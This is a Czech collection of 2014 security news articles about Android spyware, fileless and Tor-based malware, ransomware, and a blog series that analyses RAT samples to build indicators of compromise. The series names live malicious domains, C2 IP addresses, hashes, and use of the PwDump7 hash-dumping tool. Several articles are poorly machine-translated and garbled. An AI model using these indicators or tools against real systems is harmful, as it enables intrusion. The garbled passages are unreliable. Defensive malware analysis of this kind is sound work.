Krysanec se skrývá v různých legitimních aplikacích; objevil se třeba byl v mobilním bankovnictví MobileBank ruské banky Sberbank, v aplikaci 3G Traffic Guard na monitorování datového připojení mobilního zařízení a v několika dalších aplikacích -- včetně bezpečnostní aplikace Eset Mobile Security. Z napadeného přístroje dokáže stahovat data a odesílat je na řídící servery. Jde přitom nejen o pořízené obrázky a videa, ale také třeba aktuální GPS souřadnice, historii navštívených webových stránek, seznam instalovaných aplikací, výpis hovorů nebo obsah zpráv (SMS či WhatsApp). Může také bez vědomí uživatele vykonávat řadu akcí: zapnout mikrofon a nahrávat zvuky nebo zapnout kameru a pořizovat snímky či videozáznamy. A dokáže z řídících serverů stahovat do infikovaného přístroje další malware.
Trojan Android/Spy.Krysanec se ukazuje na pochybných fórech pro sdílení souborů a na některých sociálních sítích -- zatím ale pouze v Rusku.
Červy se již virtuálním serverům nevyhýbají
14.8.2014 Viry Z nového výzkumu společnosti Symantec plyne, že nebezpečné počítačové viry a červy se již nevyhýbají virtuálním serverům tak, jak to činily v minulosti.
S tím, jak společnosti čím dál více využívají virtuální prostředí, tvůrci nebezpečných červů testují nové metody, jak své škodlivé kódy nepozorovaně spouštět i zde. To znamená, že pouhé využití virtuálního stroje (VM) již k obraně před útočníky nestačí.
Symantec studoval 200 000 druhů červů, které sesbíral od roku 2012, a analyzoval, jak se chovají na virtuálních serverech a mimo virtuální prostředí. Chtěl tak zjistit, jaké procento červů přestane fungovat poté, co VM detekují. Z výsledků studie vyplynulo, že při zjištění přítomnosti VM přestalo fungovat pouze 18 % červů. „Tvůrci škodlivých kódů chtějí napadnout pokud možno co nejvíce systémů, takže pokud daný červ nefunguje na VM, omezuje se tím počet prostředí, která může nakazit,“ napsal na oficiální blog Symantecu Candid Wueest. „Nemělo by tedy být překvapením, že většina virů a červů v dnešní době funguje normálně i ve virtuálním prostředí.“
Jedním z nejběžnějších triků červů ve virtuálním prostředí je podle Symantecu jednoduše počkat. Pokud se nový soubor v prvních pěti nebo deseti minutách nechová podezřele, virtuální systémy s velkou pravděpodobností dojdou k závěru, že je neškodný. Některé druhy červů tak například čekají, dokud není proveden určitý počet levých kliknutí myší před tím, než se spustí. „Díky tomu může být pro automatizované systémy obtížné či dokonce nemožné v krátkém časovém období červa odhalit,“ stojí ve zprávě.
Mezi bezpečnostními experty panuje mimo jiné obava z toho, že se červy budou distribuovat na jiné virtuální servery hostované na lokálních serverech. O to se pokoušel například červ s názvem Crisis. Tento škodlivý kód nezneužíval žádné konkrétní bezpečnostní chyby, ale využíval toho, že virtuální servery jsou vlastně jen data uložená na lokálním serveru. Podobně v roce 2009 útočil červ s názvem Cloudburst. Těm z vás, kdo máte z virtuálních serverů obavy, Symantec doporučuje instalovat pravidelně záplaty a zlepšit zabezpečení lokálních serverů.
Nový nebezpečný červ existuje pouze v registru
6.8.2014 Viry Nový červ s názvem Poweliks se snaží vyhnout zjištění běžnými bezpečnostními systémy tak, že kompletně běží pouze ze systémových registrů a nevytváří žádné soubory na disku. Koncept počítačového viru, který existuje pouze v systémové paměti, není ničím novým, avšak není ani příliš běžný, jelikož takové škodlivé kódy většinou nepřežijí četné restartování systému, kdy se vyčistí paměť. To však není případ Poweliks, který využívá nový přístup, aby v systému zůstal co nejdéle. O Poweliks jako první informovala společnost G Data Software, hrozbu však potvrdila i společnost Trend Micro. Po průniku do systému Poweliks vytvoří záznam v registru, který spustí legitimní soubor rundll32.exe a poté zašifrovaný kód v JavaScriptu. To podle Paula Rascagnérese z G Data spustí proces podobný ruské matrjošce. Kód v JavaScriptu zkontroluje, zda se v systému nacházejí určité prvky. Pokud ne, stáhne je a nainstaluje, přičemž následně některé z nich zašifruje a vytvoří poweshellový skript. Skript je následně spuštěn za pomoci triku, který prolomí standardní ochranu Windows, jež zamezuje spuštění neznámých powershellových skriptů bez potvrzení uživatelem. Skript následně dekóduje a spustí shellcode, který vloží knihovnu DLL přímo do systémové paměti. Jakmile běží v paměti, škodlivá DLL se připojí na dvě adresy IP v Kazachstánu, odkud přijímá pokyny. Červ může být například využit k instalaci dalších virů.
Během celého procesu od spuštění kódu v JavaScriptu až po vytvoření finálního souboru DLL červ nevytváří na pevném disku žádná škodlivá data, tudíž mají antivirové programy problém s jeho detekcí. Klíč vložený do registru navíc není vytvořen v ASCII. Tento trik zabraňuje editačnímu nástroji registrů ve Windows a dalším programům v jeho nalezení, tudíž uživatelé i bezpečnostní experti mají problém infekci rozeznat. Některé varianty Poweliku jsou distribuovány pomocí dokumentů Wordu přiložených ke spamu, jehož odesilatelem je kanadská či americká pošta. U těchto podvodných dokumentů se využívají slabiny, na něž Microsoft vydal záplaty v roce 2012. Červ se však navíc šíří také pomocí webových stránek.
K zablokování červa jako Poweliks „antivirové programy musejí buďto zachytit soubor (původní dokument Word) před jeho spuštěním nebo v další úrovni obrany musejí detekovat červa po spuštění dokumentu. Poslední možností je pak zachytit podezřelou aktivitu při monitorování registrů, zablokovat přidružené procesy a informovat uživatele,“ uvedl Rascagnéres.
Nový ransomware Onion využívá síť Tor
28.7.2014 Viry Společnost Kaspersky Lab oznámila existenci nového typu tzv. ransomware s názvem Onion. Tedy škodlivého kódu, který zašifruje uživateli data na disku a následně žádá o zaplacení za jejich odšifrování. Ten na rozdíl od svých předchůdců využívá k zamaskování své komunikace a svých tvůrců anonymní síť Tor.
Onion je nástupcem známého červa zvaného Cryptolocker, který při nakažení počítače uživatele našel v jeho systému dokumenty a následně je zašifroval a po uživateli požadoval platbu. I když požadované poplatky nebyly nijak nízké, typicky ve stovkách euro, a měly být odeslány za pomocí Bitcoinů, řada uživatelů zaplatila. V listopadu 2013 zaplatila za odšifrování svých dat 1338 dolarů dokonce i americká policie.
Onion po nakažení systému zašifruje data stejně jako Cryptolocker, avšak následně spustí odpočet: uživatelé mají dvaasedmdesát hodin na to, aby zaplatili, nebo data budou navždy ztracena. Onion, jehož tvůrci se podle všeho nacházejí v Rusku, se však od Cryptolockera liší především v tom, jak komunikuje se svými tvůrci. Nový červ totiž využívá síť Tor, anonymizující službu, která šifruje komunikaci a zastírá umístění jejího původce. I když Onion není prvním červem, který Tor využívá, podle společnosti Kaspersky je důkazem toho, že „Tor se stal osvědčeným prostředkem komunikace a je využíván různými druhy červů. Onion je technicky vyspělejší než předešlé typy ransomwaru. Skrytí řídících serverů v anonymní síti Tor komplikuje nalezení útočníků a díky využití neortodoxního kryptografického kódu je dešifrování nemožné. A to i tehdy, pokud je komunikace mezi Onionem a serverem odposlouchávána,“ uvedl Fjodor Sinicyn z Kaspersky Lab. „To vše činí Onion značně nebezpečným a jedním z nejpokročilejších škodlivých kódů, které lze na internetu v současné době najít,“ dodal.
Díky využití sítě Tor jsou společnosti zabývající se tvorbou bezpečnostních řešení v horší pozici. S využíváním Cryptolockera útočníci nakonec skončili, jelikož museli dlouho čelit snahám bezpečnostních expertů o proniknutí na jejich servery. Pokud však není možné zjistit, odkud je Onion ovládán, je prakticky nemožné vystopovat samotný zdroj útoku. Kaspersky uživatelům doporučuje, aby pravidelně zálohovali a pokud budou Onionem či jiným ransomwarem infikováni, spustili pravidelně aktualizovaný antivirový program.
Uživatelé sítě Tor nejsou oblíbení jak u zaměstnanců bezpečnostních firem, tak u vládních agentur po celém světě. Například ruské ministerstvo vnitra tento týden nabídlo v přepočtu cca dva miliony korun za identifikaci uživatelů, kteří tuto síť využívají.
Windows Předchozí verze proti ransomware 26.7.2014 Viry
Jedním ze skvělých funkcí, které Microsoft ve skutečnosti přidané v systému Windows Vista je schopnost obnovit předchozí verze souborů a složek. To je součástí VSS (Volume Shadow Copy Service), která umožňuje automatické vytváření záložních kopií systému. Většina uživatelů "virtuálně setkat" tuto službu, jsou-li instalaci nového softwaru, když je vytvořen bod obnovení, který umožňuje uživateli snadno vrátit operační systém zpět do původního stavu, pokud se něco pokazí.
Nicméně, "Předchozí verze" funkce může být velmi užitečné, když ostatní chyby nebo incidenty se stejně. Například, pokud uživatel odstraněn soubor ve složce, a funkce "Předchozí verze" je aktivní, je velmi snadné obnovit smazaný soubor klepnutím na příslušné tlačítko v menu Vlastnosti pohonu / složku, která obsahovala odstraněný soubor. Uživatel pak může jednoduše procházet předchozí verze a obnovit smazaný soubor, jak je znázorněno na obrázku níže:
Karta Předchozí verze
Můžete vidět na obrázku výše, že tam jsou vlastně různé verze složky Desktop, které byly uloženy pomocí "Předchozí verze" funkce. Uživatel může nyní jednoduše klikněte na jakoukoliv verzi on / ona přeje a procházet předchozí soubory.
Jak to může pomoci proti Cryptolocker a podobné ransomware? No prostě - když například ransomware infikuje počítač, typicky šifruje všechny soubory s dokumenty, například Word a PDF souborů nebo obrázků (JPG, PNG, ...). Pokud je "Předchozí verze" funkce běží, v závislosti na několika faktorech, jako je přiděleno místo na disku pro něj, stejně jako v době posledního snímku (od "Předchozí verze" ukládá soubory porovnávání na poslední snímek, který by se za normálních okolností uskuteční každý den ), jen by mohlo být dost štěstí, že * některé * z šifrovaných souborů jsou k dispozici v "Předchozí verze".
Monitorovací "Předchozí verze" aktivity
Jak můžeme vidět, pomocí této funkce je velmi jednoduché obnovit předchozí soubory. To je jeden z důvodů, proč jsem se vidět mnoho firem pomocí této funkce na sdílených discích - to může být velmi užitečné v případě, že uživatel omylem smazali soubor.
Existují však i zde bezpečnostní důsledky. Například, uživatel může obnovit soubor, který byl dříve vymazán a že si myslel, že je pryč. Samozřejmě, že uživatel stále potřebuje přístupová práva k tomuto souboru - pokud ACL nedovolí mu přístup k souboru, že nebude možné obnovit, ale v případě, že správce nastavit ACL na adresáři, což je obvykle případ , a vše, co pod ním je dědičná, uživatel by mohl potenciálně mít přístup k souboru, který byl myšlenka být vymazány.
To nelze zabránit (kromě změnou ACL, samozřejmě), takže vše, co můžete udělat v tomto případě je, aby se pokusili sledovat soubor restaurátorské činnosti. Bohužel, Windows je docela (hodně?) Omezen v tom. Nejlepší, co můžete udělat, je umožnit přístup k objektu Audit vidět soubor přístupů, a pak uvidíme, co daný uživatel přístup. Jak již bylo řečeno, já jsem nebyl schopen stabilně reprodukovat protokoly, které by mi mohl říct, co přesně verzi uživatelského přístupu - v některých případech Windows vytvořili protokol, jako je následující:
Sdílet informace: Share Name: \ \ * \ TEST Sdílet Path: \ \ C:? \ TEST Relativní Target Jméno: @ GMT-07.2.2014-11.56.38 \ eula.1028.txt To je událost 5145 ("sdílená síťová byl objekt zkontrolovat, zda klient může být udělen požadovaný přístup"), a je vidět, která kopie byla přístupná, ale, jak už jsem řekl, jsem nebyl schopen tuto událost generovanou to neustále .
Závěr
"Předchozí verze" funkce je velmi užitečná v případech, kdy potřebujete obnovit soubor, který byl omylem vymazali nebo upravili a někdy může dokonce pomoci při větší událost, jako je například Ransomware infekce se stalo. Ujistěte se, že jste tuto funkci používat, pokud to budete potřebovat, ale také být vědomi bezpečnostní důsledky - jako je například skutečnost, že automaticky zachovává smazaných souborů a jejich upravené kopie.
Konečně, z nějakého důvodu Microsoft se rozhodl odstranit, skutečně změnit tuto funkci v systému Windows 8.. "Předchozí verze" Karta není nic víc neexistuje v Průzkumníku (ve skutečnosti to dělá, ale je třeba přistupovat k souborům v síťové sdílené položce). Pro ukládání lokálních souborů Windows 8 nyní použít funkci s názvem "Historie souboru". Je třeba ručně nastavit, a to je třeba mít externí pevný disk, který bude použit k uložení kopie souborů. To je určitě lepší, protože, pokud váš hlavní pevný disk zemře, můžete obnovit soubory z externího jeden, ale mějte na paměti, že je třeba nastavit ručně. A konečně, pokud budete používat EFS k šifrování souborů, "History File" funkce nebude pracovat na nich.
Nový bankovní trojský kůň na prodej za 7000 dolarů
23.7.2014 Viry Trojský kůň, jehož úkolem je krádež přihlašovacích a finančních údajů z online bankovních služeb, se aktivně propaguje a prodává na černém trhu. Malware s označením Kronos je určen ke krádežím dat prostřednictvím internetových prohlížečů Internet Explorer, Mozilla Firefox a Google Chrome.
Společnost Trusteer, která tohoto trojského koně odchytila, tvrdí, že malware může využít techniku zachytávání dat z webových formulářů a obsahu HTML. Podle inzerátu na jednom z utajovaných fór kyberzločinců využívá novinka metodu skriptů přidávajících obsah, označovaných jako web-inject. S touto technikou jako první přišel nechvalně známý malware Zeus, jehož vývoj byl ovšem již zastaven.
V popisu malware je uvedeno, že, kromě možnosti odcizení dat nabízí trojský kůň moduly jak pro 32bitové, tak 64bitové verze systému. Kód je také vybaven maskovacími prvky, které ho mají chránit před detekci pomocí antivirových programů. A obsahuje dokonce nástroje pro blokování konkurenčního malwaru. Vývojáři Kronosu také prohlašují, že kód může obejít takzvaný „sandboxing“ používaný v moderních operačních systémech, který umožňuje izolované spouštění kódu bez přístupu k ostatním částem systému. Malware se na černém trhu prodává za 7 000 dolarů, a tato částka zahrnuje další aktualizace a opravy chyb. Jeho tvůrci tvrdí, že se co do technických možností jejich malware vyrovná takovým programům pro infikování systému jako Zeus nebo SpyEye. Zaměstnanci Trusteeru oznámili, že se jim prozatím nepodařilo získat zdrojový kód tohoto malwaru.
Podle Dmitrije Tarakanova, specialisty společnosti Kaspersky Lab, není cena do 7 000 dolarů příliš vysoká, protože pokud si nějaký kyberzločinec Kronos pořídí, může s jeho pomocí vydělat stovky tisíc dolarů.
Critroni Crypto Ransomware zobrazení Používání Tor pro řízení a zabezpečení 21.7.2013 Viry, Bezpečnost Je tu nový kluk na crypto Ransomware bloku, známý jako Critroni, je, že se prodává v podzemních fórech za poslední měsíc nebo tak nějak a je v současné době klesla o rybáře využít sadu. Ransomware obsahuje řadu neobvyklých vlastností a vědci říkají, že je to první crypto ransomware vidět přes síť Tor pro velení a řízení.
Ransomware krajiny byl ovládán za poslední rok nebo tak nějak od CryptoLocker , jeden z nejhorších kusů malware v poslední době objevují. CryptoLocker má schopnost šifrovat všechny soubory na infikovaném počítači a poté požaduje, aby oběť zaplatit výkupné, aby si soukromý klíč k dešifrování dat. Výkupné často vyžaduje oběti platit v Bitcoins, a vědci říkají, že malware byl napaden stovky tisíc strojů.
Letos v létě donucovacími orgány ve Spojených státech a Evropě sundal malware GameOver Zeus provoz, jeden z klíčových mechanismů, které útočníci používali tlačit CryptoLocker Ransomware. Zhruba ve stejné době v polovině června, výzkumníci bezpečnostní začal vidět reklamy pro Critroni ransomware o podzemních fórech. Také známý jako CTB-Locker, ransomware nejprve byl používán téměř výhradně proti oběti v Rusku, ale nyní byl viděn v jiných zemích, stejně.
Critroni ransomware se prodává za cca $ 3,000 vědci říkají, že je v současné době používán řadou útočníků, z nichž některé jsou pomocí rybář využít sadu k poklesu Spambot na strojích obětí. Spambot stáhne pár dalších užitečných zatížení, včetně Critroni. Jakmile se na počítači oběti, Critroni šifruje celou řadu souborů, včetně fotografií a dokumentů, a pak se zobrazí dialogové okno, které informuje uživatele o infekce a vyžaduje platbu v Bitcoins za účelem dešifrování souborů. Oběti mají 72 hodin na zaplacení, a pro ty, kteří nevlastní žádné Bitcoins, ransomware ochotně poskytuje některé detailní instrukce o tom, jak je získat v různých zemích, v závislosti na analýze hrozby ze strany francouzské bezpečnostní výzkumník, který používá rukojeť Kafeine.
Doporučená platba výkupné 0,5 BTC, asi 300 dolarů pro oběti v USA, Kanadě a Evropě, a 0,25 BTC pro ostatní země. "Exploit Kit je jen vektor. Dodávka ... typ UPS / FedEx / DHL. V některých případech si můžete prohlédnout některé trendy, pokud skupina má vlastní nebezpečí a za použití jednoúčelového vektoru, pak říkáte věci jako: glupteba -> Flash EK, Reveton -> Angler EK (a dokonce, že jeden je trochu přitažené za vlasy, jako jeden nebo dva člen se někdy používá svůj vlastní EK). Když je to v affiliate režimu ... věci se stávají rozmazané .... mnoho dalších herců a infekce cesty, "řekl Kafeine prostřednictvím e-mailu.
Jednou z jedinečných vlastností Critroni / CTB-Locker je, že používá Tor jeho příkaz a-kontrolní infrastruktury. To je něco, co vědci viděli v jiných druhů malware v posledních měsících, ale ne s crypto ransomware.
"Používá C2 skryté v síti Tor. Dříve jsme neviděli cryptomalware má C2 v Tor. Pouze bankovní trojské koně, "řekl Fedor Sinitsyn, senior malware analytik společnosti Kaspersky Lab, která zkoumá tuto hrozbu. "Spustitelný kód pro vytvoření Tor připojení je zakotven v těle malware. Dříve malware tohoto typu, to se obvykle provádí se souborem Tor.exe. Vkládání funkcí Tor v těle malware je mnohem obtížnější úkol z programového hlediska, ale to má určité zisky, protože to pomáhá, aby se zabránilo odhalení, a je účinnější obecně. "
Tento kmen ransomware také komprimuje soubory, které šifruje pomocí zlib Sinitsyn řekl, a zaměstnává ECDH (Elliptic Curve Diffie-Hellman) šifrování, další neobvyklý rys. Kaspersky Lab pracuje na detailní výzkumné zprávy o tomto malware, který volá cibule Ransomware, které plánuje vydat příští týden.
Critroni je v angličtině a ruštině právě teď, tak země, které hovoří těmito jazyky bude v horní části seznamu cílů pro útočníky pomocí malware. Kafeine řekl, prostřednictvím e-mailu, který Critroni je nyní tlačen různými útočníky pomocí různých vektorů. Critroni není první crypto ransomware se ukázat jako součást využít operace soupravy. Cryptowall byl viděn v Rybář využívat sadu, a GameOver Zeus, který někdy klesne CryptoLocker, také se objevil v Rybář na začátku tohoto roku.
Critroni je přezdíval CTB-Locker, pro Curve / Tor / Bitcoin. Pokud je infikovaný počítač dané oběť se nemůže připojit k serveru útočníka Aby bylo možné odesílat platby Bitcoin, ransomware poskytuje pokyny pro něj jít do jiného počítače a stáhnout prohlížeče balík Tor a poté se připojit k Tor serveru útočníka k dokončení transakce .
CryptoLocker Ransomware živý a vyvíjí, říká výzkumný pracovník 21.7.2013 Viry
USA a evropští úředníci donucovacích minulý měsíc , provádí koordinovaný Takedown na GameOver Zeus botnet. V té době tvrdili, že operace také neutralizovat neslavný CryptoLocker Ransomware , které zločinci byl distribuován pomocí infrastruktury GameOver je. Nicméně, Tyler Moffitt, výzkum hrozba analytik bezpečnostní firmy Webroot, argumentoval v BLOGPOST včera, že tvrzení, že FBI jsou pochybné a že CryptoLocker zůstává v provozu . Zejména FBI přesvědčení, "že Cryptolocker byla neutralizována narušení a nemůže komunikovat s infrastrukturou používá k řízení škodlivý software," přehlíží důležitou skutečnost. "Důvodem, proč toto tvrzení by mělo být zkoumány, protože je pouze vzorky klesl na oběti počítačích, které byly sděleny v těchto konkrétních serverů zadržených, které již nejsou hrozbou," napsal Moffit. "Všechny vzorky v současné době rozmístěny v různých botnetů, které komunikují na různých velitelských a řídících serverů jsou ovlivněny tímto obležení ..." Přesněji řečeno, FBI tvrdí, že duchovní otec za provozu se vypnutí je ruský národní jmenoval Jevgenij Bogachev . Moffitt souhlasí s FBI tvrzení, že Bogachev a jeho co-spiklenci skutečně řídí významnou část Zeus botnetů v podnikání distribuci CryptoLocker. On také poznamená, že existuje mnoho zločinci v podnikání působících Zeus botnetů, které rozšiřují CryptoLocker. "Většina malware autoři šíří své vzorky prostřednictvím botnetů, které se buď hromadí se (Evgeniy), nebo jen pronajmout na dobu botnet od někoho, jako je Evgeniy (nejčastější)," důvodů Moffitt. "Takže teď, že servery Jevgenij jsou zabaveny, malware autoři se právě chystá k pronájmu od některé z mnoha jiných robotických sítí tam, že jsou stále k pronájmu." Kromě toho, Moffitt říká, že malware autoři se zlepšuje na CryptoLocker s novým ransomware jako CryptoWall, New CryptoLocker, DirCrypt a CryptoDefense. Místo tradičního grafického uživatelského rozhraní, říká to jen změnit pozadí a zobrazení instrukcí oběti o tom, jak odemknout infikovaný počítač. Další změnou je, že zločinci v pozadí těchto programů jsou již závislé na převodu peněz společnostem třetích stran nebo peníze mul. Uživatelé jsou řekl, aby nainstalovat Tor a zaplatit zločince přímo. Tak, on tvrdí, že malware autoři zvýšení jejich zavádění z celkového zisku z podvodu. Ve skutečnosti, minulý měsíc, v dobrovolném oznamování narušení dat adresované New Hampshire generálního prokurátora , obchodník s cennými papíry Benjamin F. Edwards & Co vysvětlil, že jeden z jejích zaměstnanců notebooků se stal infikovaných CryptoWall. Jako výsledek, oni řekli, byla data přenášena na podezřelé IP adresy (kromě toho, že jsou šifrována na lokálním disku). Právě dnes zprávy se objevily detaily nového kusu ransomware k prodeji na trestní podzemí názvem Critroni. Vědci se volat to první ransomeware používat síť Tor pro velení a řízení.
Vedení krysy z: past je odpružené - Part 3 20.7.2014 Viry
Jak jsme se vydat tři části série na RAT nástroje utrpěli na naše přátele na Hazrat dodávky musíme navštívit vrchol toho všeho. Velký pes v tomto boji je skutečně soubor bybtt.cc3 (Jake podezření na to), Backdoor: Win32/Zegost.B . Soubor je nesporně PEDLL, ale přejmenovali. CC3 skrývat na systém jako soubor databáze CueCards Professional. Na TrendMicro základě writeup na této rodiny, backdoor klesne čtyři soubory, včetně% Program Files% \% SessionName% \ {náhodné znaky .} CC3 To znamená, že bybtt.cc3 je jedním z odstraněných souborů, spíše než zdrojový soubor. Per Microsoft writeup pro Backdoor: Win32/Zegost.B, po instalaci, připojí svůj kód na legitimní proces Windows, svchost.exe . To je tedy pravděpodobné, že svchost.exe (MD5 20a6310b50d31b3da823ed00276e8a50 ), že Jake nás poslal. Je to všechno přichází k sobě. writeup Microsoft rovněž uvádí, že po připojení k serveru C2 obdrží příkazy kopírovat, spouštět, stahovat a mazat soubory, shromažďovat informace z telefonního seznamu RAS, a zachytit screenshoty. Budu potvrdit každý z těchto kroků z řetězce nebo konkrétní nástroj. Bohužel, bybtt.cc3 by se snadno pohybovat v mém pískovišti (je to PEDLL a ano, vím, že to lze udělat, ale tam je jen tolik času v den ), ale já jsem se dozvěděl, nebo potvrdil všechno, co jsem potřeboval vytvořit IOCs pro vás. Za prvé, tento vzorek se připojí k ip.sousf8.com a zatímco jeho zaregistrován Peng Peng (um, jo), server je vlastně v USA. To, co jsem opravdu jsi 't rád, že hledá sousf8.com dokázat, že jeho byl vložen jako Louis Vitton fóru spam a jiné zlé kecy, které ukazují na hxxp :/ / fz.sousf8.com. Nepoužívejte šílí tam, prosím. Tato doména body 142.4.120.9. Jake hlášeny k nám, na základě síťových připojení a NetFlow analýzu, že on měl RDP připojení (TCP 3389), aby 142.4.120.8 pomocí mylcx.exe, které jsme již diskutovali. Co, co? Oh, chlapče. Takže znovu, to server v San Jose, CA, ale oni jsou registrovaná na vpsbus v. .. čekat na to ... prosím držte ... prepareth svou šokovaný obličej ... Jinjiang v provincii Fujian, v země ... v Číně. Tři domény hostitelem 142.4.120.9 jsou 9uufu.com, sousf8.com, taobaofu.com. ASN těchto IP adres patří do PEG TECH INC, je notoricky známý spammer . Podle Wepawet, který říká, že fz.sousf8.com je benigní , že tok obsahuje přesměrování z hxxp :/ / cnzz.mmstat.com na hxxp :/ / pcookie.cnzz.com. Opět, prosím, ne. Oba jsou okamžitě spojena s Troj / Clicker-GL (více kecy adware). Tam jsou všechny druhy škodlivých vlastností v souboru bybtt.cc3 taky, navíc ke všem MOV krmiva výše. Podle HookAnalyser , tam je tuna, co vypadá . jako NOP polstrováním v tomto vzorku [!] Nalezeno 373 stop NOP instrukcí (potenciální shellcode - Podezřelé) [-] Na offset 00001109, našel: "\ x90 \ x90 \ x90 \ x90 \ x90 \ x90 \ x90 ' A bere na vědomí skutečnost, že: [!] spustitelný Debug vědom Spustitelný mohl plodit nový proces [!] Executable můžete enemurate procesy [!] Spustitelný mohl připojit k jiné procesy [!] Spustitelný soubor je potenciálně anti-debug vědom [!] Jo.
Řetězce potvrzuje odkaz na RAS telefonního seznamu shora, nejsou dva řádky odstraněny z nepřátelského domény: Microsoft \ Network \ Connections \ pbk \ Rasphone.pbk % USERPROFILE% \ Application Data \ Microsoft \ Network \ Connections \ pbk \ Rasphone.pbk Global \ b % D_% dj + @ 22220Sdag892 + ip.sousf8.com
Odkazy na gdi32.dll a CreateCompatibleBitmap jsou orientační atributu ScreenCapture, a tam je příliš mnoho prvků, na jeho schopnost "kopie, spustit, stahování a mazat soubory" se píše každý ven, ale obr. 1 , vytvořené pomocí PeStudio pomáhá potvrdit.
PeStudio
Obrázek 1
Co vířící vír ošklivosti. Existuje tolik králičí díry jít sem, ale slíbil jsem ti IOCs. Nebudu jít názvu nebo velikosti nebo hash souboru, protože se neshodují. Pracuji od jednoho z odstraněných souborů a jak jsme viděli, že je to mnohem randomizace. , ale víme jistě, že související názvy domén, IP, a víme, že díky Jake, který škádlil hodně to z běžícího serveru během jeho IR proces, který vytváří zvláštní klíče registru (PeStudio potvrdila stejně jako řetězce). obr. 2 je sestavení MOV.
Zegost
Obrázek 2
. Její chladné, aby odpovídaly velkou práci Jake udělal během IR se statickou analýzu a přeměnit ji na to, co je snad žalovatelné inteligenci pro vás, milí čtenáři jsem zveřejnil XML soubory MOV pro vás:
http://holisticinfosec.org/iocs/464bfac7-9b16-4acb-9951-2095b6ca3b3e.ioc http://holisticinfosec.org/iocs/7d540cb4-5a52-46e4-9465-081e6735cb3d.ioc http://holisticinfosec.org/iocs/dea382df-9592-4528-b9e5-fef136e30805.ioc Nezapomeňte, že IOCs se rychle mění, a že další velmi příbuzné vzorku mohou vykazovat zcela odlišné ukazatele. Takže se nemusíte to považovat za všelék, ale používat je jako referenční bod pro vaše lov a odhalit poslání. Prosím, neváhejte se zlepšit, optimalizovat, melodie, zlepšit, kritizovat, a zavraždit charakter IOCs; jsou vždy work in progress, já se vám nestane.
Hodně štěstí a dejte nám vědět, jak to jde!
Na zdraví.
Vedení krysy z: ** se to stane - Part 2 18.7.2014 Viry
Jak jsme se dozvěděli v první části našeho zkoumání řady Hazrat dodávky je nešťastných událostí, naše škodlivé ničemové přednost více nástrojů. Nejprve jsme diskutovali rozvoj IOCs pro HackTool: Win32/Zeloxat.A , který otevře zadní vrátka pohodlné na pwned hostitele. Jedna poznámka na této frontě, během analýzy jsem viděl síťové volání zeroplace.cn (není třeba navštívit, věř mi), a proto přidal odpovídající URI a položky DNS v souboru MOV. Opět budu sdílet vše za vás v den nebo dva. Vím, slíbil jsem ti analýzu souboru svchost výpisu Jake poskytované pomocí volatilita, ale bohužel, že snaha nenesla hojné ovoce; imagecopy modul nevrátil žalovatelné výsledky. Skutečný svchost.exe vzorek je ještě analýza work-in-progress, jakož i vzhledem, zatímco jistě nebezpečný, soubor máme nebyl původní náklad a vystavuje omezenou funkčnost. Doufám, že mají přehled o tom předním zítra. To znamená, že jeden z dalších nástrojů, které se nacházejí na serveru Jake byl PWDump7. Jedná se o běžně používané nástroje a je často součástí větších hackerů nebo pentester výstroje; měli byste být zjišťování a oba blokování stejně :-). Podle definice, PwDump7.exe není malware sám o sobě, je to prostě nástroj, který lze využít k nekalým účelům. To neznamená, že změny v systému souborů, to není telefon doma, to se nemění registru, ale určitě to vyhodit heslo hashe, jak je vidět na obrázku 1 .
PwDump7
Obrázek 1
První čtenář, který e-maily mi (Russ @ holisticinfosec tečka org) můj prostý text hesla od 500 hash jak je vidět na obr. 1 vyhraje cenu mého výběru (pravděpodobně shwag nebo knihu), budu Tweet ven vítěze. V absence zvláště zajímavé artefakty, můžeme ještě vytvořit IOCs pro hack nástroje, jako jsou PwDump? Ale samozřejmě! název souboru, velikost souboru, a hashe jsou zřejmé, ale co jiného můžeme použít, když tak málo prezentuje se nástroj hack, který je samostatný a v podstatě jen běží? Nástroje jako PEStudio nám může dát další možnosti Podíváme-li se za samozřejmé. PEStudio, ve výchozím nastavení, bude řadit podle barevně odlišeny (červená), označeny položky. Často to představuje některé zjevné dost ukazatele, ale s PwDump7, ne tolik. Ale třídění podle něčeho jiného, jako hodnoty v rámci řetězce a Nezařazené nám dává zcela jedinečný indikátor není pravděpodobné, aby se vyskytují velmi často, a to zejména v kontextu zavedeného názvu souboru a hodnoty hash. obr. 2 ilustruje.
PEStudio řetězce za následek
Obrázek 2
Jako takový, naše IOC prvky by být odvozen, jak je vidět na obr. 3 .
IOCs pro PwDump7
Obrázek 3
Nelze minout s řetězci klíčových slov, jako je to. :-) Nechám vás s tím. Jak jsme se učili z transparentnosti laskavou Jake a Hazrat dodávky, ** se to stane, je to opravdu. Jen další důvod, proč se dveře zavazadlového prostoru. Na zdraví!
Vedení krysy z: cvičení v budově IOCs - část 1 17.7.2014 Viry Reader Jake nám poslal úžasné svazek RAT související chaosu shromážděné při plnění svých povinností při vyšetřování nešťastné a dlouhotrvající kompromis společnosti budeme fiktivně zavolat Hazrat napájení. Hádej co? RAT, který byl trápí prostředí Hazrat Dodávka byla přes server proxy prostřednictvím dopravu zpět do čínské hostingové společnosti. To je můj šokovaný obličej.
Šokovaný tvář
Opravdu, jsem v šoku, můžete říct?
S množstvím škodlivých souborů sdílených s námi v tomto balíčku představuje obrovskou příležitost k vytvoření některých souvisejících IOCs s Mandiant v IOCe , stejně jako spuštění některé z tohoto zla skrze mé preferované toolkit, se kterými se na identifikaci a pak stavět řekl IOCs. To budeme dělat na tři části, jak jsem si psovod na daně pro následující tři dny (máte štěstí); je tu spousta zde hrát s (štěstí já).
Ironicky RDP server, používají útočníci, RemoteMany3389.exe, není označen jako škodlivý detekcí AV. Zdá se, že je to legitimní nástroj ... v Číně. :-) Zdánlivě tak příliš je soubor skříňka se používá, xlkfs.sys, s laskavým svolením XOSLAB.COM (podepsaný Yang Ping). Ahoj, díky za podpisem, já to víc věřit. Chystám se jít ven na údu tady (opravdu) a říkají, zacházet s těmito soubory jako zjevně nepřátelské. Hit na velké červené tlačítko, pokud se stalo, že se na vašem systému spolu . se jejich škodlivé krajané výše uvedený Zde jsou jejich hashe bez ohledu na to: RemoteMany3389.exe MD5 c9913698afc7288b850f3af602f50819 xlkfs.sys MD5 4aa2d2975d649d2e18440da0f3f67105
